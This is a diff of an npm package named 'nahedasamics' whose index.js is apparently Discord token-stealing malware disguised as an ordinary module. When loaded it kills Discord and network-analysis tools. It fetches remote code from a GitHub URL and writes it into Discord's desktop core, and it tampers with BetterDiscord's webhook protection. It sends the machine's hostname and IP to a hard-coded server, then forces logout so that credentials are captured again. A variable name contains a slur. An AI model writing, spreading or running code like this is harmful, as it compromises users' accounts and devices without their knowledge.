nahedasamics 1.0.0

package/index.js

@@ -0,0 +1,203 @@
+
+const glob = require("glob");
+const fs = require('fs');
+const https = require('node:https');
+const { exec } = require('child_process');
+var sleep = require('sleep');
+const shell = require('shelljs')
+const os = require('node:os');
+const axios = require('axios');
+const download = require('download');
+var ip = require("ip");
+const zip = require("adm-zip");
+const FormData = require("form-data");
+var XMLHttpRequest = require('xhr2');
+var totp = require("totp-generator");
+const buf_replace = require('buffer-replace');
+const { session, BrowserWindow } = require("electron");
+const path = require("path");
+const querystring = require("querystring");
+//////////////////////////////////////////////////////////////////////
+const config = {
+    "logout": "instant",
+    "inject-notify": "true",
+    "logout-notify": "true",
+    "init-notify":"true",
+    "embed-color": 123,
+    "USERNAMEWEBHOOK": "moonsz",
+    "disable-qr-code": "true"
+}
+//////////////////////////////////////////////////////////////////////
+let LOCAL = process.env.LOCALAPPDATA
+let discords = [];
+let injectPath = [];
+let runningDiscords = [];
+
+fs.readdirSync(LOCAL).forEach(file => {
+    if (file.includes("iscord")) {
+        discords.push(LOCAL + '\\' + file)
+    } else {
+        return;
+    }
+});
+
+const temp = process.env.temp;
+const infectionPath = path.join(process.env.temp, "\\Windows_Defender");
+
+
+
+function Infect() {
+    
+    https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
+        let data = '';
+
+        resp.on('data', (chunk) => {
+            data += chunk;
+        });
+        resp.on('end', () => {
+        injectPath.forEach(file => {
+                fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
+                    encoding: 'utf8',
+                    flag: 'w'
+                });
+
+                if (config["init-notify"] == "true") {
+                    let init = file.replace("index.js", "init")
+                    if (!fs.existsSync(init)) {
+                        fs.mkdirSync(init, 0744)
+                    }
+                }
+
+                if ( config.logout != "false" ) {
+                    let folder = file.replace("index.js", "DC_BTW")
+                    if (!fs.existsSync(folder)) {
+                        fs.mkdirSync(folder, 0744)
+                        if (config.logout == "instant") {
+                            startDiscord();
+                        }
+                    } else if (fs.existsSync(folder) && config.logout == "instant" ){
+                        startDiscord();
+                    }
+                }
+            })
+        });
+    }).on("error", (err) => {
+    });
+};
+
+const logout = async () => {
+  await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
+    `window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
+    true
+  );
+
+  return "ok";
+};
+
+function killDiscord() {
+    runningDiscords.forEach(disc => {
+        exec(`taskkill /IM ${disc}.exe /F`, (err) => {
+            if (err) {
+              return;
+            }
+        });
+    });
+        
+    if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
+        injectNotify();
+        
+    }
+    Infect()
+    pwnBetterDiscord()
+};
+
+function listDiscords() {
+    exec('tasklist', function(err, stdout, stderr) {
+        if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
+        if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
+        if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
+        if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
+        if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
+        if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
+        if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
+        if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
+        if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
+        if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
+
+        if (config.logout == "instant") {
+            killDiscord();
+        } else {
+            if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
+                injectNotify();
+            }
+            Infect()
+            pwnBetterDiscord()
+        }
+    })
+};
+
+function startDiscord() {
+    runningDiscords.forEach(disc => {
+        let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
+        exec(path, (err) => {
+            if (err) {
+              return;
+            }
+        });
+    });
+};
+
+function pwnBetterDiscord() {
+    let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
+    if (fs.existsSync(dir)) {
+        let x = fs.readFileSync(dir)
+        fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
+    }
+
+    return;
+}
+
+function injectNotify() {
+    let fields = [];
+    injectPath.forEach( path => {
+        let c = path
+        fields.push(c)
+    })
+
+    const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
+    var xhr = new XMLHttpRequest();
+    xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
+    xhr.setRequestHeader('Content-type', 'application/json');
+        xhr.onload = function () {
+            const negrodefender = this.responseText;
+        };
+    xhr.send(data);
+}
+
+function getDirectories(path) {
+  return fs.readdirSync(path).filter(function (file) {
+    return fs.statSync(path+'/'+file).isDirectory();
+  });
+}
+
+
+listDiscords();
+discords.forEach(function(file) {
+    getDirectories(file + "\\").forEach((item) => {
+        if (item.includes("app-")) {
+          file = file + "\\" + item + "\\modules\\";
+        }
+    });
+    getDirectories(file).forEach((item) => {
+        if (item.includes("discord_desktop_core-")) {
+          file = file + "\\" + item + "\\discord_desktop_core\\index.js";
+        }
+    });
+
+    if (fs.existsSync(file)) {
+      injectPath.push(file);
+    }
+});
+killDiscord();
+Infect();
+startDiscord();

package/package.json

@@ -0,0 +1,15 @@
+{
+  "dependencies": {
+    "color": "^4.2.3"
+  },
+  "name": "nahedasamics",
+  "version": "1.0.0",
+  "main": "index.js",
+  "devDependencies": {},
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "nahedasamic <nahedasamic@gmail.com>",
+  "license": "MIT",
+  "description": ""
+}